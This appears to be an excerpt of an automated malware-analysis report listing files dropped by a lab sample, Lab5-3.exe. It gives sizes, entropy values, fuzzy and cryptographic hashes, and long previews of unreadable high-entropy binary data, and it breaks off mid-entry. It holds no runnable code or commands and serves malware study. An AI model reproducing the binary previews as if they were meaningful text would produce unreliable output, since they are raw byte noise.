                                                                                                          Preview:|.=..2...i.]......A..`.m.C...-,x..~.1.5f....>..F|.p.f.......wr..i*.i.....A..~.D..H/(.cf3N#C1....Tf.\.(z..I.....5P."..8..w(P.*7".q...$...R2^S..a..H........g.t. 4'N.......>..9...5@%5.wXr..-(..p."q.P.%..D=).hUq.>..mi.G..(......@.B&1.K.Z....]5)\..bF-..XL)B.....p..6....w.`.1.[(.6....JV3...f..sq..9..0..Rlp.(;..c0..}.0..v..C.Ip`T.!..Uu.bj.,+..a....b.[...K.KL....CB...R.....X.....{....N..9Udj...g.....(R..HB.^.R...?...8e...k....T.......=..^...B....E@.Lo...N...k.]:.z...c..?u<..c..........<.s_.y.VG8.BV..-..$....!z...6_.....J.l.eX._....., ..FEm&..O7.3...u...w\.]2.O..{Ojj.......!.fio...c..>...*....z..c.E...}.H..*...E.n.3....a3a.8...e..:.... ......`.8..|%....[irr..4C.......e'iK...s7.C..3e.CD/\......."`.."aR....~.......0....R[x..K..{..5.O{[.......c....h.p.&.6)xC..!a.q....i^.B..bn.q/.v.).D*K..>.....Z.i-.....m{..W.. E.b...q.2>.....jB..B6...B.G..P...g....W...\.........y..z.r.7.......P....MAk.,.p.;...]...p.+.yz...9u7....O..]d..@.k.}..C|.1y".N.|...^t(9.....8..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6912
                                                                                                          Entropy (8bit):7.974553125448824
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/K/bSAxmwt3C9RiinK/kYNRNcioy5QN8e0p+NQN1OBXpADpFfHEaAYqUfGx0uKeR:udU7KMYHNcioYseLsBX6v7q30Cb
                                                                                                          MD5:2CF378E15F54ACF165CD1957ABA36A19
                                                                                                          SHA1:3D76926EE0B53B2E4DDD5C95E9FFAAD73105736E
                                                                                                          SHA-256:9EDDFCD1DE25E55B6076973509806D1DA16B7E5B4F89A30A641EAF2C73921D93
                                                                                                          SHA-512:34F442CB0C3C44157C13AAEC188F5C9EF533239C7BF722FCEE4D3DBD0B04B2989CEEAC172019508C27517DF4D5D46071979F8B25B6FA617235A4FBB4A287DA8B
                                                                                                          Malicious:false
                                                                                                          Preview:...I....|.#.......eMzz...h..T2.%.@....{..(.>.....u.7..5.......&..62.Yv...,t..V^.8D.G{|C...z....&.o....Czi..*...x..c...?Sh.z.<s.J_+..._\....NQ.4d..R..{.....=......p.^.t.b[..lC....=.;.b..#.l.......T.sb.@.+BUl...$..~.u.......V.}.i7WuX..............4&..c..~.C/........x.....Z.@U6.0......s..;.u?Gg%.0BG.I.(I..6!.eC?*!.O..#..9j.n.J..D...T...m...j[L..90......Y`..+K_..qS7..G0..a9]R.^.}[.;.Ig...q'...C..2a.+..J.&......Bt$...fxo5....*....T...~..|.8HM.f.;M...!&.x...`.|..<. B^LK._WZu.*T.Y4.4.7...+...l....(...QZ..=L......Nj.<...&..RE&V..M.2K..g...H...t...H..........7..']..2.......v....U.P.o+.......6...E..!....P...X&.M8'...... ./\..Xr.TxwK.....;$..[#'i..d.....].6..\..r.]B..y.u..*..}.^Qog....e...Y.%.......f.X.8,..+.wn./.........#A.&%nK..kfy.9.i.[.Q...A.B5{>B.8}...N...0......q.......y..M.h.L.).... ...".I$..E..cj....R|.....5.Y.O....~..T..a|....,Kl...B.*...u.|a .^.Z"`.....&.9jg.....K....._........1.....U..H3`...<}Bb....n....$m.....Kx}W..Z....TvX_..S..P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10864
                                                                                                          Entropy (8bit):7.982719870293322
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:LyngRAv4AtMY8q32xPRcqM/SXiQWdHSRo0eXDsmV3zxohOA1sgwa+Wqxj0Cb:enge4AGY8q32wGiQqMJismVVohOsn+HV
                                                                                                          MD5:3C32EA1D14D78B03A47A750FE99421F2
                                                                                                          SHA1:9C115686E473C0CFB2E6B2974C18D28FE5265EB9
                                                                                                          SHA-256:643118D18FE644347E6E6F8190D584BDE8B4F28413AB0E207DE375EFCBF357F0
                                                                                                          SHA-512:E693BC19A5980B8CE22D60DCA4A6F9E8B533EE4747B008A655D21A1303F55CBBB44EB33AF7885FFFE864F774F86D494078D8CCED93F28F241A2EFE0565F4776A
                                                                                                          Malicious:false
                                                                                                          Preview:SR......r..T.W....3........+....4...o...g..:....d.xmq...'.22...Y...8.C.#k.....Y....b....PX....Z...KR.Mw....~-a.V..L)S..!Kd.....v......I...>..q_..t.wr`.pb...:~.[.-..2.i.....I..@\.x.~..%#@3'....Z..=.e5...s.._..B.^T..qxX.... .X..z.6...#....>..f...%xS.0.`.(9r..+.....R.....l@.p|.%<....K..-...Rj..bU..../.b..<.b..TP[....;..}g..."e..a#...XM.......e.G..W..g......h?#*..@.......g.3.....V`.s.`<...m.U.$...gM<w.@......5.....:&}... V..........tJz..S.....|....N.....p.gN}..\..*D".,../........8h.d.....n....9W..~.C.[.4c.'...Y.T@+"...^..V-.'.......o...G.x..sI.{.9.>...c...G...M.S......\o..E....k.%?+.".%...l..|I.,...o....1....R...K&K....m1.(.....4.5G7.....Ns.m.s.@.......>.Fu....>T./.$........'..$..4*.(0..bu...r.x.9...:...D.1..B6....s.y.K..../!.M.<...TX!.R.=Mtj..tG...h.....Om.L4.-i......yYw...b]q....v.......X>$f...jT....W#..g.....S...g...H...i.$..P..!.O(.~1..!...9.@....|.;....`....6+#m....W.I.X....N+....6...7[......#...Uh%9.{-......4v...\.,a.r@.l.Z.gP.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12512
                                                                                                          Entropy (8bit):7.983822599653949
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:qG+qp9HCIbe59RME+xtGRHLQ3g7e1F5C4NVhF9tv+KBeo0Cb:5OQevRALucqU86p9tTBptb
                                                                                                          MD5:4B66473CB7D4E46C5163EDE77FF8EBE1
                                                                                                          SHA1:7F6D5AC52A615089C76A57EED0C9E9B4A61FD136
                                                                                                          SHA-256:DE64A51950DD5078A95A5552754BC582DFDA44533C999E9C7F5600BCF04C0F3B
                                                                                                          SHA-512:38F1CFA05086C02D54755B3A9253A6C5E56EF53CED333C6BC91B88D416395CAC922D92BAD4922D274AA99644BC09670600489418231C3DB7AC91F2CDF8FD7F7F
                                                                                                          Malicious:false
                                                                                                          Preview:..l.\?.v..B.. ...{c.I...w.*.s....#~.....[........ZU......7O.39..^.]}K3...,..k..z..Hn.^,..^W..W.6......;..,g;"...f.a.t.2......Aa.......0.O..z.......Gi..X.n.U.[3..BK.UW/..Q..>JT...'2Y...#6.....y....e....d....v.V.......3..U.:......0.D...Q.Y.P..=..,.~9.}.c...`c>....'$.e...1.@)........'....w.2).....6.`...(U]..7.+...y"j]....q10o.IBuk'.>..jI.>.-...A..ocNi.p.....G..a.yD....h........tq]..e..{.........."...7...+..!]...v.X}?c..P..D.I..^*.oh..E...Y.L.}.T..\........[.~b.....d/......t.j.....5...W.~D0..?QY.s....).tJ9e.%.[<..^..ki.].........+c(>s0..0.....'...K]..............^...v4..-T5.A...;...j!....p..u..gppy.kdJ.f).j...~.fv.S..d.s......G...f.....v...~I..7z.,m[.^..-.!...4+'.e.jK2.....C!c..e4N.sh..=.%.O..Oa...R$~M+....%....-....4.GT...3...2.........uL.j....F.}..\..V...(.O.eK...o...C.!....{ B..d..2."...].j.....em].D....5..lN..`....vZ.._I|...{..G.ZT.. X.>P..V.].=........f..U.....$..:.c.. .].U&."....S3}S.8..%a..+9..3.(Q5).7.{|E].........(C2j...T.^...*..-.CM0M"..;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10704
                                                                                                          Entropy (8bit):7.983038395345557
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:23M4HX/Uun4+qUJ2Fuz5QWLv9QcTcpf4CgHumLDdhTjjGyAemLrfF0Cb:2vXVO/uz5XBQcTcv6umbyeqFtb
                                                                                                          MD5:BC6392D2E48010889E3CEE685CE8355F
                                                                                                          SHA1:62B2D9A21A260BCECFD4930742818638395EB955
                                                                                                          SHA-256:485B08DC5B7662C6E20FA962103ACF3ECF907062CAA1DDAD19AA3F59D2F24524
                                                                                                          SHA-512:0C3657D94ECBEDAC1923268A73F30A8048B5BD11C739F5EF48F59A4FBA12DC63FD169F82561757570343BCFC08AE966F80573DC4BA73B516397813AB524DEB7C
                                                                                                          Malicious:false
                                                                                                          Preview:.@...m.n0...3M..w..&../..z...{..f......=..p.R.#..="..59o...olc[......$.q...$g......u...^.e......JP7C.N.(%&.o./.....op..2.5.7...B|...b..MQ].Tm..wK.PQV-........s..."Y,..O.9..K.O=.c.D.9..R..Z..FV.....:.W.m.!..Q.U.TJq..:..%..4I`...<...c.P.y......Ta..aJ....{N....w..E+.:.".qxXM..$Q..].L.....u.....>.....&......F..g."yHx... Np..9*fF..=~........y.{...P.v!+...<...`.Cz_..".F.<K...S.....TNcxj..$..f...>E....v....=+C.%^.c.&........L.*..W.N.C.=..<..G^...!.&........P.....7#.........*.....3..B(v{.....d.....PQ&.}.=.m=_9I..Uk..sqQ...ni..db..|..r.:....j..2....A.V..$Dw....z.$.[...g.........td.[.]~.G.9:...5o]F..q1...U.;.k<E....*..n.Vn...z.M.y..%K..jqC.mMG"J8...&..^.K.P...i...pW.SRX....).G..H,.X.bi..y.|.U...J.&...mIlD...>6Y.9.]w..1.r.u..q8...0.y.. A......T#5<d..7T...c.9... ......Zu..Y.a..5)....4....?.E.7w....<..f...c..AF.4U.B..._...6T...-..+'.*......]...=Q..j...8.....o.....(m.T.|.95N...,...>.....0.......vx..,..Jz.=NF4......U.\z.J...y..+p.dJ)..j.........z/.[/n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6768
                                                                                                          Entropy (8bit):7.974754225992386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cMmQ2PsPNNENSVzy8AJo4SqZJFjsqGzK0Cb:cxePNNEUNy8YzS4JFjsq8Ktb
                                                                                                          MD5:A1849A76A53F9F70029548017FB80FA4
                                                                                                          SHA1:A3485D5323783EB889DA2A6B9B810BCE8CA545C0
                                                                                                          SHA-256:8C153D8744910E30548BE638254A9D9AEC5EAE18CB29A6C192FE88973D33AF3A
                                                                                                          SHA-512:26DE69616996B8CC64E98802E79D74C755057A8FA1747AC286AB2229C4A3B4AF6925C507C2806EF8A0EE06FABCEAAC6FC87F66AC7B857F05BAA8F08E50DB0ABA
                                                                                                          Malicious:false
                                                                                                          Preview:...z..EWi.p...a*_.~.m..HWD,*...|Y.=..v..[.#.Cm..%A.$......k..~....D.+@.{..h...f....F..C../..c..... ....c'...v.=k8H.p.....D....2...q..{.U[...|..)F..........4..}.......T.62z.Z1.p..h,0.....r0.r..%..:@.`.)......x....m.6I......t|=...#..|..8.#kz.~?..w.....K!...v=....y...w....I..z....d..A.....A$(.|......us.x.R....i........g.q....C.....o%\.).._......G....Q7|F`,.@..}.'..p...E#-~.m.Z..........O*.....|....0..{..V.70L..U.....Vy.(F..{k..ul.I.2....3.k...Yi.M.Z...?.'j.6!..L.J.S..$.A..&L..y..Hr..,'@W..iO....a"_.s.y....qE.....q....pM.L.[..hm].9.?t...X.\........g.R2W..<.5r...!z.X.`...h...Hc...ml......E....t.L.%...M.t...........p..q@U2R.rg ...>....!...tI....Q>..H.{M..-b.....c..1..[P..,Z...-.k...Y.0.n..o-..+..4.T. ..O..Ts4...y.P.s.....UY.)......d.....E.y%n.}.T....]..d...!.{.v..c.C+.&.._...0....N.......<p,..V...8.na..>..0...XQ.v5.RIW..2y<pZy.]y.NU.w.8...-+..f;'..l.W...;....3@<N{)...F.b>..Lw8$.1.\3..(f(JA...1...T).`..Q.+...)..b'.%......3...D.......V..lH_.&z:.NT!.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9920
                                                                                                          Entropy (8bit):7.983675086519043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Uqr50P/PEcXmWiepb0Vu8Em0OCcJSmzZeKHIawG0u01FrCLLZ0Cb:/OPEcxiUUudmycJS65yfzyZtb
                                                                                                          MD5:86546F819A410B118DBEEF3601C6CD84
                                                                                                          SHA1:046346785C5A8C78AA6422BF8F234B3F8EAB5F3A
                                                                                                          SHA-256:D5994D8B83F5266E69B30247362163D6CE278C3EEF480B3759371F5E16F8027E
                                                                                                          SHA-512:21FC082CF3FDAE764FA750E0D6A84750EA5A588DF61C5123B9B16DE288B7AF62801B26BCF3C58F89B776CBCECC667365D3BB9C5296F25E5D809F74E386C1B4D4
                                                                                                          Malicious:false
                                                                                                          Preview:..W...J..x.{e!s......U..uq...z.&./.)...!CR...U.C.9f.k.....urp.m.....O...o.7 ..._5v....2...J..}.C.{..%.x.S....J.....h37k.j.+m/..&x.2w..(.....aA...wx.J.]A.:..cZ.*..-..g }...FL@.>...ue4y......!2.lZ...5^..........\.._...].k.^.8.Q[...*.Sw.&VF....e.Bx@..a>Jp...B..EvB..i.....9...9....vQ...H.|m^A..r.......?.qu<s.K:?.....pi...6M....%...g..p..,UK.Q./...jS....j...5...[.w...'n..D...V(..o...y..5O]M...".?U.......:..@Y.G.d ..D..}.ve.K...3G...".*E.n......;.........[+...\.YJ....Qn..y.#Mj.{k....8w.u.@.......:._..;R.E.dj.....-...*0M..G...Ov....w@.."6...lm.....9C..R...K..=...D2J.....EV...~$@$.Uj...k<2........9M.w.....e.!......T......KR^l[.2.z...J'..)....Z......j.P..5A2.r..jV+:t....K...N.,.z$..r>%............8.m^.E2]..A..?t.uS.......!%.?..c.}..Z.>.O....W...@l.GnE...D./.X&.UA3..J>.K....o8.g.8.t.F0..:.]..n..$g.Z.".....5?.:L...pXF[.y......R...i(K.TI&|.5.....BX..E.g...a.J...c.g.y.../k.?]_.l.e>....7..F.T...+..P.....mvdS./f..S.....{...p%&...0F......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11120
                                                                                                          Entropy (8bit):7.98195632542967
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:IuXHF6y1z4NtWRRy1ItcJQgCayYB58cgbkFzXYLusWOyQaPlR8daaX4D0Cb:5XcY4iy1IaJQgCac2yRyv9GQuetb
                                                                                                          MD5:601F82CC43B3DA7CD3EC93FB5BD68F1F
                                                                                                          SHA1:B41AB796E7FFEB793675A3B9B8EAC083E0FACC76
                                                                                                          SHA-256:B940FA6D885829B5B37F861FF22C08B4B81BDB942614376962B9EE3FCD3D4131
                                                                                                          SHA-512:5D7EAD37F571F7AA24974033BCB6DA968EA54F71F68F16961D5AAB3F6DC75CCF0DBABEA7FA3A522F6EF3B796402D09E1058D54EE679CB30E52FB3D965AF66125
                                                                                                          Malicious:false
                                                                                                          Preview:!.9..V6...../...Q.`.........e.*..4..........7....A.g?..2*....{.......z?.L+.(x...$>.U..i..........Q....4E.TV.'.F....D.....d...l..[.r..kW6..{...g...}.V@..~Kh.a....h~..^...e..9...V....u^).RT.......Mz...4{..e.....G..o..{..9,..G.M....i+T.h...L....!..........e,.i......6.q.;p/..]..a.H.C.\.- ..6........ ..Q.ww..f.....t...#)Q.uJvYP%.{.*..&...s.=.x..pJ..;<{.a!7.j.gFL..N.co*.k.........O.@....xv.....+..B)s..H.......k.@......-"v.9MV.N.c.....q><.........-...a<'P...x..1{A.2..x.Y.!.=...zR-3&..-.........%.mR..6.P.Wo...g\.)%u..1:...?Wr_..`..^..9T..N.....*].).|..>......zk..u5.7v..O...u.;..Pn.(is0{v^X..p..9......%&.E.$...B.0.)@2.....gFg.OP.~%H.#.X.Am....u.......`....Q.k...O.......C.I6.........C.(E.h.O.X../.7.i....H(.K..g...K.,.w..\s-j....R.. .C.r.~I...4.{....'..^<..w2........!..t...e.......g./.8.(.d...B,....G.......v#...E\jz.V!L...2.6%..!..T..OsD^.X65.f.y.r........@=..P...7.&v.....i.? .....7O..JW...A..]R.'....*...p&.....H.P.ja...<.N..W.R..`.#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18464
                                                                                                          Entropy (8bit):7.989663329131766
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WHrHakKfF8KcAy79P2WXaa+kxbgH3SB6D4uLgm6OwYWXifLKtb:ED4fGKs2WX9+kxY1gZ0zKZ
                                                                                                          MD5:B5B4F9E994E18EB40B49425037ABA658
                                                                                                          SHA1:78F9203B5FC5CEF03619B69A8D79AFD79D886E5E
                                                                                                          SHA-256:4F79730CC24DC4D3BE2982566F1AAD0660578F289690719B88EA80853F1FD33C
                                                                                                          SHA-512:8DC65EA55D1E43BAED55AE6318A128C61B929C275B5B327276D12CFEC257414EF6EDA335E6984068F7A3429E659C49F8CDD30A79A337228D8230CEFC1C6664A3
                                                                                                          Malicious:false
                                                                                                          Preview:.0M...idkA......<.2...L .O5a~.o.,..|.....&dkt.........t.[Qa...?/.....|.Dn.HS....#.v...`.?L......Ic+...X..*....o..%.U.*&e..u.x......dA.e...l.s+..........0..Aa./in...S$.!$.Q.F.#ko....1k..8.....0Y.U%.......Rz:..I...0[.#`@.)C"6....G.t...t..D...S......3W.)|....}<&...xW...?..n..Bx..Y.+............%..F.kL..;.......Fm..A.....A.d...&>..... f...c....d.E3...X..z..BN...^.F.b..{'......f.......:..f2...?$~..'..B....rN.N.....>.......[.%...[....cX....>..@..:.=>sToMcB?..t.C#..........%.y.b..|`.Z.V.D..../...X.......'^S..*.K......'...]....L.N.0.UG.....XC......ri<.;8.L..9.NNf.<UU..I}.....@M....4..n3n..W....r........D.Vl.H.......x|!4.C....+S..5..l.+#....Y......!.....k[.....k.&....<.tj..vG..O..1...>. d.....B......W[.t..'F.Ai....:HY\\...}7..9......{QG...*....A..w.|0./"...V'.L.F;~X....X)....8.Y. 5....{.........q..=[.Yw..F..D.:)@.:.....F,.GX...As$l.q1<.E...7Y..,.xWa`o:..r..Ec5.^...))h..T....W}k.!.....1..d~...Z..UA&.~.o..!...._......h.P../;..,..l...jl/7..W.*..Jf..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9472
                                                                                                          Entropy (8bit):7.980693432604153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:7+rllxXAl2r+/ecBO2UNB/sGfotus6iqJi+dY0DJy+T0Cb:7+5lxXQ2r+rYNBdfotjmi+d3Vjtb
                                                                                                          MD5:4CAA6B2B3BE92D1C4D4CDC0AEB366D69
                                                                                                          SHA1:DCAAEA01F5A62EC7F9FD058BA27C88A88BC31FBA
                                                                                                          SHA-256:AC7FC3CD02E29208338ED1051B037D266EDBC4758E54ECAF01E9436EE43E650F
                                                                                                          SHA-512:2E17681F6951C135604BC0EA1E097ABC5B8AF0B43B414083CC5F03EFCEA960FF14EAAA5491DF044C9E1CEB06E007E09A07E3046D26992A1AFFB6FEAAE65195D9
                                                                                                          Malicious:false
                                                                                                          Preview:.WV&...3...X.....fXVX.Z....t.gE....y.mm.ZfA.g.lQ.C*..0W.e...K2,...v..-ev......Y..&-x..].d..z....~.....<(.6N.v.Y..O.....g_.3:i...Z...4..4lq..{)......s..&..}.0S....z`..+!.!..;.!o..../....^...g.4gES....W..e....*.[..E5&.....{V......b..I...y..O....p'....t...z.Jg..j,.M..?#...>......z.....<X;5.........X..M;.;.../L1>l#r%....)2.1.G...(.d.............g....Z.CBp.m....:.*......~A....V..x.P%Dn..g.m.]u j"V.|....uj.L@.'....A.UY..1...!..F.......YP.0..Av..1I.L..'RbP..I..g....h.,......[......*.!.p.$..Y.z...X47Q.3.L p..=.I..oj..1kErF..k-a..ht.x...-..Q '..t...C.Q>.<....WLL..Q..F.ps.0~..on#../b...VW~.F.#..C~j9....B.o...]GoA. >7...%..:....m...>F.r.[.}1."t.....1...YO.S*...tI SLh.....,..I..t.b...,....Q....%..l.w...n/......2...*........=..p.a.m.M....C....@Wv~{...]...i..J.^|{._9Y...g......~.w...E...=.........7.0(.....q.$..vj...H+t.Oq5[..........=.0..$.Ac..$KlU....Yo.3'.....H..5...h&..g...-.M..NV..d...&....9.2ti...K.nF6J..../.z7.....,.<..R}...[.>...I.uY6..w0.>..A
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6816
                                                                                                          Entropy (8bit):7.971801617671409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:qaWtI27aHRGm6m2w3fQDjtQ69FUdUeTOtT0NHzMzHBYwPlL5JGx0uKeY2ElUJ:qaMIXZ68Qm69RziTMmgL5y0Cb
                                                                                                          MD5:D3B82548962B079896630D3FD78E8F18
                                                                                                          SHA1:B1ADFA640FCABB0A84A1687E51C0CA8C3D0AC2CC
                                                                                                          SHA-256:85DC2B4CB6A28AD227E98FF8D26B2313B3581B2AA0B3C0EB87DDD9C0B177B5D3
                                                                                                          SHA-512:4A601AD88F9593A43CF2EC7647ECF20DA46E139695F71BBF900F2DC4559EF46735AF41413803F51CFE79B6AC13968BD5349F0445596E90DCFEB243BE7B759038
                                                                                                          Malicious:false
                                                                                                          Preview:...s#..k08...~....G........{.G..R...\..b.6.7^.j.W..F..t,..,...E.Y.....G. G..Q..b..I.b......Y.`x.6.....c..."#y......G.c..s....Ql.......Ih.r.f.a..!,.8{..H...H1mK........G!.S.......r...m.R.wJ.{^'..FH.].*.\e....+.y....1.R?<eT..d.-..{..n...'d}G......[......LY....m)w]..4..X.PP.= t. ,..>.....e....z..S...<......E1]..g.?...5b....|.B...z...T:..u.I...1.........:..J.n.f....n....=......).$Hh.UC....#d..o.'..z&q.......`h.p..L ..@.=.+..MpJS.M.ZP...)..\t"R./..3.... "B.o4H.&N..A.FW[..L..x..gt.Qas...D.s...c..I...lOZ.d/5,E.r.........X.-...o..I...v.}.B.o#;...=......8.^.~/cR.B~.<..zAz..}...`g....'..K......A.]./..V....._...,..G.O............j<.4.B7P..P...&.MH.+..S!R.(k..:9..3.[.N.. .k........)~B........-R...w...;n...\.....+m....$UXIf..'f.9,&0q..y..6..\_...a...J.....}zIF..N<...W...#.....ex.@X..^3".K...s.JW..=...H.(.A.*4k.48..C...&..ZjB+..4.....I..R.....u.Kq7.r=.5$.c........!~.....T.9B..'...q."...2H..0._.Pw...dt..v.a^..g...?UK.GH...9w.g....a..:../|..D..(J...'.....QZ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11600
                                                                                                          Entropy (8bit):7.985273528047463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:pqnfyzost1nZKWqbiC7Ld5YwVdqYj2Y5g0CP/UlO1psIbevXF/mfIyCwk9rTZW0a:pqfyzRvnEZbiCPYwVdqIe0CPMlO1ydyv
                                                                                                          MD5:921A35C0B1BF987FE3E23B835934E4CD
                                                                                                          SHA1:B77BDEA1192B23CC5051F3809930EBA8DC5BD7F8
                                                                                                          SHA-256:65A552128590758E1F9C63B8ED2BDA44FF43EB7E872A2AC2C087A734474B7D2A
                                                                                                          SHA-512:CE6D2BB954B2968C4EDC37A3FBB3FA3028C66580AFB1862DF700EC051304C50F5A4D87CBBCD0AB643F2367016169F409610A3EEDEDFEA7DA4A4CA1B8F1CF2E02
                                                                                                          Malicious:false
                                                                                                          Preview:.0....Q...t^..$G}:]T.).....k[..v./.....4A.....^...i.$......=.n.%......s..........(v....`.xH,.e.".PgX...\...)..bV.vFm.,.....z^0&.......K....m,.(d. ..x?.... 3..5..+V.. p;..&..c........b.G.FS..k|...T#.O...._...oLTv.!(.b..x...........zp. .j....m.}DO`.".;...*#...'....[....... .1.....y(....K.2.7;....c.;x....`..d#...*q..Ji..Y0h..AD.f..|</.@.z......wm..X...6*P..Y.XU..^..1...C../.....)....S-.......\Y2.N/.u~.ga.I..../.]..t...z.`.U7C.Q<E..j..=..b.<......4.uT.q.".....D.......js#..ma.GVwb....`..B3.........8..f.....^.......*HP...p...2.ax.Ae.....r.6}.].-..A..ln.ZH._..!Y.5-.jS..:....T~.E...4.i.Q.N...~q.m.h.}&...mpc....`.'.(a..z.i._cv&{..] ;.p(.k5.LGz.5......Zg.[.G*.#.aS`(...f2..}.%wT. .T.v..kAg..3.-...'.I..>.2..C4M.(ei......{.g.B.S;....j.r ..X<.d..xk..nl......Jn..2h`...s......XI.C.........;..rrQ..hn..e..g..F.f.?.hhV...6..J.!...B...2=.-..7.._....@.K......uD..p.a.:O.......1S.:1ux.g.k..G..DkK:R...|P....\...bOu..|.>7.m.m.....Z...4..b.D.[7...g.z..S.Q...S./."8.)..Z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8624
                                                                                                          Entropy (8bit):7.978445271093297
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Y9x7o14O2MyoGZ+BE3pTAItp0Sz6zIDtwCoD3Rx6nU1+JeiVhSY0Cb:Y7e4O2EGQWZ3WB8hwvRxoJeiiYtb
                                                                                                          MD5:11C00BDD6AB8157E319C245D7A4D5804
                                                                                                          SHA1:181361F31C703760F0D377A8C1F2EF1FDCA106B3
                                                                                                          SHA-256:ED796B8F70864D925D1264942B6C7CE65852D58D52C2B12C8F37855E5E407257
                                                                                                          SHA-512:51FD816F35809211D79EED3E987E136082B71A5B0A8BF433E61668D81BB06D58C9F3522A56A6A012B1C11415BDFE59A52F527ADAAA5F46F733E5FAC1B0F1578D
                                                                                                          Malicious:false
                                                                                                          Preview:.?.F.........S&..8(...R...t`>.`..q"Z.q.7.....GH;..Q....t..m..*>...+.....H...{...\na.V..B{w<.}B.._.[.h2.)...gv...D.............rB...+..i|L.h..:.U...N.\\"z.W....3....A.v...U...h.....(=.., .......Y..t...(...<\.swE.Tkx...'...V..qd1....)$...KJ..8...V.>..r....w.x.2....|#...G.n..j.....2....tv......6.=0...1@j..........!.j..j.5....\>.i.................k..E:..0".RTj]....l.|.............. ..2...+Q..u.,./.4.Z.$.O...........]{...X..\.C..N:.N./D..].7_q.......L..........G&...J..|o....rF...9n..&=...e.....4..A....:..M..BW..K..&)...c7i^..e.).=.o.9{8..IQ.....L...n.ZP}P..B..@.........8.}R.=..[.%].a_.>....7`.'0>|...#R.....&....:....s..1.<.h......G.cxM4" .p*......o.{y..............s`.`....%..Y.H.yE.-n..P{W*.^...z.n....9...a#s.~q..Ck.J.v........vj........>..r..?..|A..2..-.)a..>Q.!4....Iqp.h.i.]..,I...c.=..[.[..i....>.HT.....:....D....I}@........?#..h{.1.z2.F:....A.#.....(......EVOr@J...........a..KUq.,v.A.B.r......N.d!.|.......|.O..n..M..5tl
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9280
                                                                                                          Entropy (8bit):7.976922901965008
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3SiDuAyq5d23/AXCVbgCagkUDCUFUuLfxn90Cb:huA9IoXm0CNkUDLFlLfx9tb
                                                                                                          MD5:0F4495530D7F88649A996C6F1CE9E9E9
                                                                                                          SHA1:F8BD284A2BB002F245FEE38113FBA7FDB74D4CD3
                                                                                                          SHA-256:ED4E64C662B4A6DC92380CFC47D09E5B1281B9E41049C1CCFF9C5A91E8037C0D
                                                                                                          SHA-512:5CA98F3DE95ADBCFD32F56065FEAC7239E629141BF725E102C7895AFEC290F6C741D44B883AA530B950138520A6CC10BBAF653E505823A7668A9E69D46B16C6B
                                                                                                          Malicious:false
                                                                                                          Preview:...e..... .y...F._:.....HP>,Z..E.m../...xT&....._$.."+3;.'...i...ms.M.....0?.lWYe*..{."....Z...9.....E#.}.u'R...<.j..$...4_\...1...V....Kff#H...v..W.E......:...8..*..u].h.c........:....8..&...I..c...FFJ...#...>....hbc..v.-..m......... ......b.9.a.M).%s..(ph.b..nF`.gZ<..E.a.n.8.`'./].E.K......^.^E.2t..l./..X;...(..w.....P.(.....{...]......>.x...SdE...p*AZ.<?!..^V...Q0....%.....T...B"|O...B..o..#0H[J.Z(..?.ZK.d.>y{=..M..l....5z.S.].Gr..=.%..#.."&;.&....Z....7....H..S.b..+.....,T.Zr..j.....iHl.....)...m.r.).^.b..d.....Xd...Y........O0A..&$....R..I0v..r.{..B..;PE>./.<!d.J....$..].j../.$..>..DW;.pXbZ...P-..-.!.....W.0.A<:.3.U4:..y...u.......0...N.6...Q;.....t.nQJgA..o..7`.T.Rw.`. ...E.....".M.n}...L...i..Y...u........Q4..y..i.'X...Yj../L1.e.....C..$.*.".O.../._........e;.6..wK...q...P5Xw.G....c-..h..>..In.....W~[....P|..<]:......hY)R1.UwL=?...w.>.M.......4....3.c.O.2.D...c.|$v%G..G....%B...T...8e........[.X.D....t..W...%b...Y...@h.)p$.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10224
                                                                                                          Entropy (8bit):7.981392858829079
                                                                                                          Encrypted:false
